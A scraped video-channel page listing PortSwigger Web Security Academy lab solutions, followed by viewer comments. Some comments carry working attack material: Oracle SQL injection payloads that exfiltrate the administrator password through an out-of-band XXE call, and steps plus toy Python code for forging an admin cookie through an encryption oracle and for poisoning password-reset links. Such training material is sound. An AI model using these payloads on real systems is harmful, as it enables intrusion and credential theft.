- 286
- 3 222 036
Michael Sommer
Germany
Joined 2 Aug 2011
Lab-01 NoSQL
This video shows the solution to a Portswigger Web Security Academy lab. All techniques shown take place on systems provided by Portswigger for this purpose. All techniques are for educational purposes only and not for criminal activity.
Views: 124
Videos
JWT Lab01
8K views, 2 years ago
This is the solution video of the lab "JWT authentication bypass via unverified signature".
JWT Lab02
5K views, 2 years ago
This is the solution video of the lab "JWT authentication bypass via flawed signature verification".
JWT Lab03
7K views, 2 years ago
This is the solution video of the lab "JWT authentication bypass via weak signing key".
JWT Lab04
3.6K views, 2 years ago
This is the solution video of the lab "JWT authentication bypass via jwk header injection".
JWT Lab05
4.2K views, 2 years ago
This is the solution video of the lab "JWT authentication bypass via jku header injection".
JWT Lab06
3.3K views, 2 years ago
This is the solution video of the lab "JWT authentication bypass via kid header path traversal".
JWT Lab07
2.8K views, 2 years ago
This is the solution video of the lab "JWT authentication bypass via algorithm confusion".
JWT Lab08
2.2K views, 2 years ago
This is the solution video of the lab "JWT authentication bypass via algorithm confusion with no exposed key".
CSRF where token is duplicated in cookie (Audio, Explanations)
10K views, 3 years ago
This video shows the lab solution of "CSRF where token is duplicated in cookie" from Web Security Academy (PortSwigger). Link to the lab: portswigger.net/web-security/csrf/lab-token-duplicated-in-cookie. CRLF: developer.mozilla.org/en-US/docs/Glossary/CRLF. Document.forms: developer.mozilla.org/en-US/docs/Web/API/Document/forms. Link to the short video: ua-cam.com/video/VT9uDDSu1-w/v-deo.html
CSRF where token is duplicated in cookie (Audio, Comments)
2.8K views, 3 years ago
This video shows the lab solution of "CSRF where token is duplicated in cookie" from Web Security Academy (PortSwigger). Link to the lab: portswigger.net/web-security/csrf/lab-token-duplicated-in-cookie. Link to the video with explanations: ua-cam.com/video/5MFAjX4mklY/v-deo.html
CSRF vulnerability with no defenses (Video solution, Audio)
37K views, 3 years ago
This video shows the lab solution of "CSRF vulnerability with no defenses" from Web Security Academy (PortSwigger). Link to the lab: portswigger.net/web-security/csrf/lab-no-defenses
CSRF where token validation depends on request method (Video solution, Audio)
19K views, 3 years ago
This video shows the lab solution of "CSRF where token validation depends on request method" from Web Security Academy (PortSwigger). Link to the lab: portswigger.net/web-security/csrf/lab-token-validation-depends-on-request-method
CSRF where token validation depends on token being present (Video solution, Audio)
10K views, 3 years ago
This video shows the lab solution of "CSRF where token validation depends on token being present" from Web Security Academy (PortSwigger). Link to the lab: portswigger.net/web-security/csrf/lab-token-validation-depends-on-token-being-present
CSRF where token is not tied to user session (Video solution, Audio)
18K views, 3 years ago
CSRF where Referer validation depends on header being present (Video solution, Audio)
7K views, 3 years ago
CSRF where token is tied to non-session cookie (Video solution, Audio)
22K views, 3 years ago
CSRF with broken Referer validation (Video solution, Audio)
10K views, 3 years ago
Excessive trust in client side controls (Video solution, Audio)
16K views, 3 years ago
High level logic vulnerability (Video solution, Audio)
18K views, 3 years ago
Low level logic flaw (Video solution, Audio)
19K views, 3 years ago
Inconsistent handling of exceptional input (Video solution, Audio)
13K views, 3 years ago
Inconsistent security controls (Video solution, Audio)
11K views, 3 years ago
Weak isolation on dual use endpoint (Video solution, Audio)
4.7K views, 3 years ago
Authentication bypass via flawed state machine (Video solution, Audio)
8K views, 3 years ago
Flawed enforcement of business rules (Video solution, Audio)
7K views, 3 years ago
Infinite money logic flaw (Video solution, Audio)
16K views, 3 years ago
Insufficient workflow validation (Video solution, Audio)
6K views, 3 years ago
Authentication bypass via encryption oracle (Video solution, Audio)
17K views, 3 years ago
Information disclosure in version control history (Video solution, Audio)
32K views, 3 years ago
I wasn't able to make it work; for whatever reason I'm getting a 400 'You already have a logged in session on the site' response after using the token from the *dropped* request. FF and Chrome. I'll try later with a new ID.
Thank You Sir for your work. It has helped, I encourage you to do more for those who want to follow the web application hacking and are determined to complete the Portswigger Labs First. Again Thank You for your work.
"Deliver exploit to victim" never works for me; I never see an access from another IP in my access log.
Just do some explanation if you want us to learn from you
Hard lab; even following the video it cost me a lot of effort to finish. Thanks for the video!
Thank you for the helpful solution! I wanted to share an interesting detail from my experience with this lab. At first, I mistakenly used the string returned in the response body as the administrator's password. However, after carefully checking the request subdomain in Burp Collaborator, I realized that the actual password was hidden there! It was a valuable learning experience for me, and I hope this comment helps others avoid the same confusion. Thanks again for sharing the solution; it made a big difference! Best regards, C
No need to go to burp search, just send the GET /resources/js/tracking.js from http history to the repeater. Click send few times the request from the repeater and you will get the administrator API in the response.
@MichaelSommer This is the easiest part of BB; the first time I found it was in 2019. It is still found everywhere but can't be exploited further: only the origin IP shows, and no BBP accepts this; they need exploitation like an internal leak of something. Can you exploit it further? Thanks, for the bounty.
What is that symbol used between username and password?
This feels like cheating
Sir, you have the Pro version, so it was easy for you to enumerate the password, but we have the Community version; you should also give an alternative for us 😅
00:08 Understanding session cookies and their impact on web security.
01:08 Understanding CSRF with non-session cookies and parameters.
02:26 Updating email addresses in application settings.
03:36 Demonstrating CSRF token validation with non-session cookies in a browser environment.
04:54 Exploration of browser interactions and CSRF prevention strategies.
06:03 Overview of CSRF token security challenges with non-session cookies.
07:22 Using proxy tools for CSRF token generation.
09:23 Discussion on how cookies impact CSRF security.
Where did you click to get another host parameter in the request section? You just clicked somewhere outside the screen and suddenly another host parameter popped up. Where did you click, at 3:59 to 4:01?
Hi Michael, you didn't tell us why you edited that request page in Repeater. It's not about just solving the lab. We need to understand the fundamentals.
Entere website any username media have crime practice the Will in wipe out of connect suitable system.
For anyone who is new here from the PortSwigger website and for whom this doesn't work out:
Remember to add "%3b%20SameSite=None" at the end of the cookie, as the solution suggests.
Change the header to HTTP/2 (not HTTP/1.1).
Inside the email value, change it to @ instead of %40, or it'll be encoded to %2540.
Pay close attention to the URL.
Good luck hacking. I can change the victim's email by using "view exploit", but when I send it, it didn't register as complete lol
If anyone needs it:
' UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//_____/">+%25remote%3b]>'),'/1')+FROM+dual--
If anyone needs it:
'+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'._____/">+%25remote%3b]>'),'/1')+FROM+dual--
I did 100% the same but it wasn't solved, just a shit video
I did it!!!
Can you help me resolve this issue?
java Exploit.java
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
/home/kali/Downloads/Explit/data/productcatalog/ProductTemplate.java:3: error: package common.db does not exist
import common.db.JdbcConnectionBuilder;
^
1 error
error: compilation failed
Thanksss!
To anyone who can't find or open 'git cola': just install any .git reader from your browser, it doesn't matter which.
Sir, but I am having Community edition issues; is there any solution for the Community edition???
Just simply add the injected query here so people can see and reuse it.
I'm kind of disappointed in Michael's solutions as he does not explain what each step does. Getting the lab solved is not really the point if one wants to learn how to do it from scratch.
you don't explain anything
Thanks man 👍
I don't understand why the get request to my account triggers the macro. After the macro testing part, going to intruder to spam the account page with get request seems unrelated.
Why do we have to click the add button twice?
My lab didn't get solved. I also tried to put it in the URL, yet it still doesn't solve my lab; it gives me the alert but doesn't solve the lab. Any help?
I cannot catch what you are saying; even using closed captions doesn't help me. Thanks.
It would be great if you explained in more depth. Now it is just like you are showing the functions of Burp.
Thanks a lot for your solution using git cola.
That's not working for me. After the creation with "logo_uri" it's good, but when I take the "client_id" and paste it into this request -> GET /client/N084rdIDBx3QaInf-95/logo I get an "Internal Server Error".
And my OAuth server is broken; I need to wait and restart the lab.
UPDATE: I found it; after 4 resets, we need to make all requests in HTTP/1.1.
you are the worst tbh!!
kill me
For those who didn't get it: setting the X-Forwarded-Host header tricks the backend server into generating a password reset link pointing to your exploit server. The frontend server is expected to pass this header to the backend, but since you set it, the link ends up pointing to your server. When the victim clicks the link, their reset token is sent to your server. This lets you capture the token and reset their password.
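The mechanism the comment above describes, as an added example that is not part of the video or of PortSwigger's lab code: a backend that builds the reset link from X-Forwarded-Host (or Host) beside two safe variants, one that takes the host purely from configuration and one that honours a forwarded host only when it is on an allowlist. The host names, the query parameter name and the exploit-server host are constructed for the example and are not the lab's.

```python
"""Password reset poisoning via X-Forwarded-Host: vulnerable vs. fixed link builders.

Added illustration; not the code of the lab or the video. All host names and the
token parameter name are assumptions made up for this example.
"""
from typing import Dict, Optional
from urllib.parse import urlencode, urlsplit

CANONICAL_HOST = "shop.example"                                  # hypothetical configured site host
TRUSTED_FORWARDED_HOSTS = {"shop.example", "www.shop.example"}  # hypothetical allowlist


def _forwarded_host(headers: Dict[str, str]) -> Optional[str]:
    """Return the host the request *claims* to be for (header names are case-insensitive)."""
    lowered = {k.lower(): v for k, v in headers.items()}
    return lowered.get("x-forwarded-host") or lowered.get("host")


def build_reset_link_vulnerable(headers: Dict[str, str], token: str) -> str:
    """Backend trusts whatever host the (supposedly) front-end forwarded.

    An attacker who adds X-Forwarded-Host to the 'forgot password' request for a
    victim makes the e-mailed link point at a host they control.
    """
    host = _forwarded_host(headers)
    return f"https://{host}/forgot-password?{urlencode({'token': token})}"


def build_reset_link_fixed(headers: Dict[str, str], token: str) -> str:
    """Never derives the link's host from the request; uses configuration only."""
    return f"https://{CANONICAL_HOST}/forgot-password?{urlencode({'token': token})}"


def build_reset_link_allowlisted(headers: Dict[str, str], token: str) -> str:
    """If a trusted proxy legitimately rewrites hosts, honour only known values."""
    host = _forwarded_host(headers)
    if host not in TRUSTED_FORWARDED_HOSTS:
        host = CANONICAL_HOST
    return f"https://{host}/forgot-password?{urlencode({'token': token})}"


def token_leaks_to(link: str, attacker_host: str) -> bool:
    """True if a victim clicking `link` would deliver the token to attacker_host."""
    return urlsplit(link).hostname == attacker_host


if __name__ == "__main__":
    # Constructed request headers: the attacker injects X-Forwarded-Host.
    poisoned = {"Host": CANONICAL_HOST, "X-Forwarded-Host": "exploit-0a1b.exploit-server.net"}
    for builder in (build_reset_link_vulnerable, build_reset_link_fixed, build_reset_link_allowlisted):
        link = builder(poisoned, "t0k3n")
        print(f"{builder.__name__:32} {link}  leaks={token_leaks_to(link, 'exploit-0a1b.exploit-server.net')}")
```

The allowlist variant is the one to use when the application genuinely sits behind a proxy that rewrites hosts; anything else the header carries is an attacker's value, and the safe default is the configured canonical host.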
I think the videos from this channel should be banned from portswigger official solutions
This channel is harmful for the internet and security community due to the lack of explanation in basically every video. Guaranteed frustration if you want to "understand" from these videos.
why no sound ?
Has anybody been able to solve this lab recently?
Nooo, have you solved or not ?
@mscreative3262 I tried every freaking method, even with Burp Collaborator; it's just not getting the robot user to click on the link.
I cannot resolve as well. the burp collaborator is not getting for robot user to click.
I wasn't able to either.
Same here
1. Initial Setup and Observations
Log In and Stay Logged In: Log in with the "Stay logged in" option enabled. Post a comment and observe the requests and responses using Burp Suite. Note the encrypted stay-logged-in cookie.
Invalid Email Address Submission: Try submitting a comment with an invalid email address. Observe that a notification cookie is set and includes your email in cleartext.
2. Encryption and Decryption Exploration
Burp Repeater Setup: Send the POST /post/comment request to Burp Repeater and rename the tab to "encrypt". Send the GET /post?postId=x request (with the notification cookie) to Burp Repeater and rename the tab to "decrypt".
Encrypt and Decrypt Data: Use the email parameter in the "encrypt" request to generate an encrypted cookie. Use the notification cookie in the "decrypt" request to decrypt data and see the output in the error message.
3. Exploiting the Encryption
Decrypt Stay-Logged-In Cookie: Copy your stay-logged-in cookie and paste it into the notification cookie in the "decrypt" request. Send the request and note the decrypted format: username:timestamp.
Create Administrator Cookie: Copy the timestamp from the decrypted stay-logged-in cookie. In the "encrypt" request, set the email parameter to administrator:your-timestamp (replace your-timestamp with the actual timestamp). Send the request and copy the new encrypted notification cookie.
4. Bypassing the Encryption Prefix
Handle Prefix in Decrypted Message: Decrypt the new cookie and observe the "Invalid email address: " prefix. URL-decode and Base64-decode the cookie in Burp Decoder.
Adjust for Block-Based Encryption: In Burp Repeater, delete the first 23 bytes from the decoded data. Pad the email parameter with 9 characters to make the data length a multiple of 16, e.g., xxxxxxxxxadministrator:your-timestamp. Encrypt and decrypt the adjusted data to ensure it's valid.
5. Using the Self-Made Cookie
Remove Prefix and Finalize Cookie: Delete 32 bytes from the start of the decoded data after ensuring the length is correct. Re-encode the data and use it as the notification cookie.
Gain Admin Access: Send the GET / request with the new stay-logged-in cookie (replace the session cookie) in Burp Repeater. Verify that you are logged in as the administrator.
Delete User: Browse to /admin and use the delete option to remove the user carlos (e.g., /admin/delete?username=carlos).
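The steps in the comment above, as an added example that is neither the lab's code nor the video's: a toy model of the server's encrypt and decrypt oracles and the attacker's forgery. It assumes a CBC-mode cipher with a 16-byte block and the IV prepended to the ciphertext (the lab does not state its cipher; under that assumption, dropping the first 32 bytes removes the IV and the first ciphertext block, and the block that ends the padded prefix becomes the IV for the "administrator:timestamp" blocks, which is exactly why the 9-byte pad and the 32-byte cut work). The block cipher is a deliberately insecure permutation standing in for AES, the key and timestamp are made up, and the cookies are plain base64 rather than the URL-encoded base64 the lab returns.

```python
"""Toy model of the 'authentication bypass via encryption oracle' technique.

Added illustration, not the lab's or the video's code. The block cipher below is
a throwaway invertible permutation (NOT secure); only the CBC structure matters.
"""
import base64
import os

BLOCK = 16
KEY = b"0123456789abcdef"             # made-up key, would be secret on the real server
KEY2 = KEY[::-1]
PREFIX = b"Invalid email address: "   # 23-byte prefix the server's oracle prepends


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _block_encrypt(block: bytes) -> bytes:
    """Toy 16-byte permutation: xor key, rotate bytes left by 3, xor second key."""
    x = _xor(block, KEY)
    x = x[3:] + x[:3]
    return _xor(x, KEY2)


def _block_decrypt(block: bytes) -> bytes:
    x = _xor(block, KEY2)
    x = x[-3:] + x[:-3]
    return _xor(x, KEY)


def _pad(data: bytes) -> bytes:             # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def _unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(plaintext: bytes) -> bytes:
    """Returns IV || C1 || C2 || ... with a random IV."""
    prev = os.urandom(BLOCK)
    out = [prev]
    pt = _pad(plaintext)
    for i in range(0, len(pt), BLOCK):
        prev = _block_encrypt(_xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(data: bytes) -> bytes:
    """Treats the first block as the IV; each block only depends on the block before it."""
    if len(data) % BLOCK or len(data) < 2 * BLOCK:
        raise ValueError("bad length")
    prev, out = data[:BLOCK], []
    for i in range(BLOCK, len(data), BLOCK):
        cur = data[i:i + BLOCK]
        out.append(_xor(_block_decrypt(cur), prev))
        prev = cur
    return _unpad(b"".join(out))


# --- what the server does ---------------------------------------------------
def encrypt_oracle(email: bytes) -> str:
    """POST /post/comment with a bad email: sets notification = Enc(PREFIX + email)."""
    return base64.b64encode(cbc_encrypt(PREFIX + email)).decode()


def decrypt_oracle(cookie: str) -> bytes:
    """GET /post with a notification cookie: the error message shows Dec(cookie)."""
    return cbc_decrypt(base64.b64decode(cookie))


def make_stay_logged_in(user: str, timestamp: str) -> str:
    return base64.b64encode(cbc_encrypt(f"{user}:{timestamp}".encode())).decode()


def stay_logged_in_user(cookie: str) -> str:
    """Server-side check: decrypt, split on ':' and trust the user name."""
    return cbc_decrypt(base64.b64decode(cookie)).split(b":", 1)[0].decode()


# --- what the attacker does -------------------------------------------------
def forge_admin_cookie(timestamp: str) -> str:
    pad = b"x" * (-len(PREFIX) % BLOCK)          # 9 bytes: prefix+pad fill exactly 2 blocks
    cookie = encrypt_oracle(pad + b"administrator:" + timestamp.encode())
    raw = base64.b64decode(cookie)
    skip = len(PREFIX) + len(pad)                # 32 bytes = IV + first ciphertext block
    return base64.b64encode(raw[skip:]).decode()  # remaining blocks decrypt cleanly


if __name__ == "__main__":
    ts = "1700000000000"                          # made-up timestamp
    forged = forge_admin_cookie(ts)
    print("decrypt oracle says:", decrypt_oracle(forged))
    print("server logs in as:", stay_logged_in_user(forged))
```

The same cut works for ECB, where there is no IV and the 32 dropped bytes are simply the two prefix blocks; what would break it is a MAC over the ciphertext or a random IV that is kept server-side rather than shipped in the cookie.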
I can follow, but I won't be able to use this technique in my real life ever... There are a lot of assumptions there which I have no clue about.
This guy explain it better: ua-cam.com/video/kIRIV-BwBTE/v-deo.htmlsi=7hZU-182VJU00gI3
From CL.TE to TE.CL without much explanation, oh portswigger u did me dirty!!!
I was hoping this was more of an explanation of the attack, why it works on this lab, etc. Instead it is just a word for word video detail of the solution posted on the lab. As other commenters have commented, I would have expected new codes to be generated each time the macro runs. Still not clear on *exactly* what is happening here, just that following the steps leads to a successful login.
For all practical purposes, it would be impossible to guess the correct MFA code if new codes were being generated on each attempt. If there are 10,000 possible codes, and 2 guesses can be made with each session, the probability of guessing a correct code is ~.0002, or ~.02%. Despite the lab stating that verification codes reset, I don't think that is the case. Either old tokens still work despite the session changing, or the token is not changing between sessions. That may be the bug in the MFA system in this lab, but in any case, it is poorly explained on PortSwigger's side.
If you don't have Burp Suite Professional, get help from Python :)
Giving us the solution is nice enough, but I was expecting an explanation too.
Hey, I have Burp Pro, but I can't find the subdomain I'm supposed to use for Collaborator. You see how you pasted it in that long string? How did you do that? Where did you get it from? OHHHH, I got it: when you click the clipboard button, it pastes your Collaborator domain to your clipboard, ha. Damn. Thanks.